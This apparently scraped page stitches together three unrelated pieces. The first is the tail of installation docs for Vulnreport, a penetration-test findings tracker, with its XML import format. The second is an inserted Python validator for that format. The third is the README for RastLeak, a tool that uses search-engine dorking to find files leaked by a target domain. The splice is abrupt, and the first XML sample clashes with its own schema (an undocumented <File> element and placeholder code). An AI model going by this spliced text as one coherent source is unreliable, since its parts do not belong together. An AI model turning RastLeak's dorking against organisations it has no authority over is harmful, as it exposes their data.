You’re ready to go – for documentation about how to use your newly-installed Vulnreport instance, see the full docs at http://vulnreport.io/documentation

Custom Interfaces and Integrations
Vulnreport is designed and intended to be used with external systems. For more information about how to implement the interfaces that allow for integration/synchronization with external systems, please see the custom interfaces documentation at http://vulnreport.io/documentation#interfaces.

Code Documentation
To generate the documentation for the code, simply run Yard:

yard doc
yard server

A Note on XML Import/Export
Currently, Vulnreport supports an XML format for importing Vulns into a specific Test. This is useful if Vulnreport sits on a different network from the one you pentest on, so that you record findings with a different client while actively testing. Note that the format is tied to your specific Vulnreport instance and its Vulntypes configuration.
We’re working on supporting a few other types of XML import (ZAP and Burp, for instance) as well as allowing arbitrary XML export/import between Vulnreport instances. Stay tuned as we hope to push these features soon.


The XML format Vulnreport currently supports is:

<?xml version="1.0" encoding="UTF-8"?>

<Test xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <Vuln>
    <Type>[Vulntype ID]</Type>
    <File>[File Vuln Data]</File>
    <Code>
      [Code Vuln Data]
    </Code>
    <File>clsSyncLog.cls</File>
    <Code>
      hello world
    </Code>
    ...etc...
  </Vuln>

  <Vuln>
    <Type>6</Type>
    <File>clsSyncLog.cls</File>
    <File>CommonFunction.cls</File>
    <Code>
      12 Public Class CommonFunction{
    </Code>
  </Vuln>
</Test>

<?xml version="1.0" encoding="UTF-8"?>

<Test xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <Vuln>
    <Type>REQUIRED - EXACTLY 1 - INTEGER - ID of VulnType. 0 = Custom</Type>
    <CustomTypeName>OPTIONAL - EXACTLY 1 - STRING if TYPE == 0</CustomTypeName>
    <BurpData>OPTIONAL - UNLIMITED - STRING - Burp req/resp data encoded in our protocol</BurpData>
    <URL>OPTIONAL - UNLIMITED - STRING - URL for finding</URL>
    <FileName>OPTIONAL - UNLIMITED - STRING - Name/path of file for finding</FileName>
    <Output>OPTIONAL - UNLIMITED - STRING - Output details</Output>
    <Code>OPTIONAL - UNLIMITED - STRING - Code details</Code>
    <Notes>OPTIONAL - UNLIMITED - STRING - Notes for vuln</Notes>
    <Screenshot>
      OPTIONAL - UNLIMITED - Screenshots of vuln
      <Filename>REQUIRED - EXACTLY 1 - STRING - Filename with extension</Filename>
      <ImageData>
        REQUIRED - EXACTLY 1 - BASE64 - Screenshot data
      </ImageData>
    </Screenshot>
  </Vuln>

  ....unlimited vulns....

  <Vuln>
  </Vuln>
</Test>
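As an added example (not code from the Vulnreport project), a small Python validator for the import format specified above: it enforces the “EXACTLY 1” and “if TYPE == 0” constraints, flags child elements the spec does not list (for instance <File>, which the first sample uses where the spec names <FileName>), and checks that screenshot data is valid base64 before the file is handed to a remote instance. The sample document is constructed here from the spec’s element names; Python is assumed as the language of the client that records findings.

```python
import base64
import xml.etree.ElementTree as ET

# Constructed sample import document (not from the Vulnreport project).
SAMPLE_XML = """<Test xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <Vuln>
    <Type>0</Type>
    <CustomTypeName>Verbose SOAP Fault</CustomTypeName>
    <Screenshot><Filename>fault.png</Filename><ImageData>aGVsbG8=</ImageData></Screenshot>
  </Vuln>
  <Vuln><Type>6</Type><FileName>clsSyncLog.cls</FileName><Code>12 Public Class CommonFunction{</Code></Vuln>
</Test>"""

# Documented <Vuln> children; Type and CustomTypeName are "EXACTLY 1", the rest "UNLIMITED".
ALLOWED = {"Type", "CustomTypeName", "BurpData", "URL", "FileName",
           "Output", "Code", "Notes", "Screenshot"}

def validate_vuln(vuln):
    """Return the constraint violations for one <Vuln> element (empty list when valid)."""
    problems = []
    types = vuln.findall("Type")
    try:  # REQUIRED - EXACTLY 1 - INTEGER
        type_id = int(types[0].text.strip()) if len(types) == 1 else None
    except (ValueError, AttributeError):
        type_id = None
    if type_id is None:
        problems.append("Type: exactly one integer required")
    if type_id == 0 and len(vuln.findall("CustomTypeName")) != 1:  # STRING if TYPE == 0
        problems.append("CustomTypeName: exactly one required when Type is 0")
    problems += [f"{c.tag}: not a documented Vuln element" for c in vuln if c.tag not in ALLOWED]
    for shot in vuln.findall("Screenshot"):
        if len(shot.findall("Filename")) != 1:
            problems.append("Screenshot/Filename: exactly one required")
        try:  # tuple unpacking enforces "exactly 1"; validate=True rejects non-base64 input
            (image,) = shot.findall("ImageData")
            base64.b64decode(image.text.strip(), validate=True)
        except (ValueError, AttributeError):  # binascii.Error is a ValueError subclass
            problems.append("Screenshot/ImageData: exactly one base64 value required")
    return problems

def validate_test(xml_text):
    """Map the index of each invalid <Vuln> to its problems; {} means the document imports cleanly."""
    root = ET.fromstring(xml_text)
    if root.tag != "Test":
        return {-1: ["root element must be <Test>"]}
    report = {i: validate_vuln(v) for i, v in enumerate(root.findall("Vuln"))}
    return {i: p for i, p in report.items() if p}
```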


RastLeak – Tool To Automatic Leak Information Using Hacking With Engine Searches


Tool to automate the discovery of leaked information using search engine hacking.
How to install
Install requirements with:

pip install -r requirements.txt

How to use:

python rastleak.py

Usage:

$ python rastleak.py -h
usage: rastleak.py [-h] -d DOMAIN -o OPTION -n SEARCH -e EXT [-f EXPORT]

This script searchs files indexed in the main searches of a domain to detect a possible leak information

optional arguments:
  -h, --help            show this help message and exit
  -d DOMAIN, --domain DOMAIN
                        The domain which it wants to search
  -o OPTION, --option OPTION
                        Indicate the option of search
                                1.Searching leak information into the target
                                2.Searching leak information outside target
  -n SEARCH, --search SEARCH
                        Indicate the number of the search which you want to do
  -e EXT, --ext EXT     Indicate the option of display:
                                1-Searching the domains where these files are found
                                2-Searching ofimatic files

  -f EXPORT, --export EXPORT
                        Indicate the type of format to export results.
                                1.json (by default)
                                2.xlsx

